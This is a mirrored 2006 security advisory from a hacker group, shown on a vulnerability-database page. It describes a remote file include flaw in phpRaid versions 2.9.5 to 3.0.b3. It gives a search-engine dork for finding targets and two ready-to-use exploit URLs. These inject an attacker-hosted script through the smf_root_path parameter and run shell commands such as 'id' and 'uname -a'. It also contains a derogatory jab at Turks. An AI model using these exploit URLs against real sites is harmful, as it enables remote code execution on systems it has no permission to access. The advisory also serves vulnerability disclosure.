Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12592
HistoryMay 09, 2006 - 12:00 a.m.

[Kurdish Security # 5] phpRaid Remote File Include [SMF]

2006-05-0900:00:00
vulners.com
7
JSON

Kurdish Security Advisory

phpRaid Remote File Include [SMF] :}

"Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & [email protected]

Risk : High

Class : Remote

Script : phpRaid

Script Website : http://www.spiffyjr.com

Version : phpRaid v2.9.5

" v3.0.b1
" v3.0.b2
" v3.0.b3

Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D

Special Bastard : Turkish Lame

w0rkz : "phpRaid" "inurl:"phpRaid" etc. :)

cmd shell example:

cmd shell variable: ($_GET[cmd]);

Vulnerable code : Now SMF portal code :)

// includes
include($smf_root_path= . 'SSI.php');

http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id

http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname
-a

JSON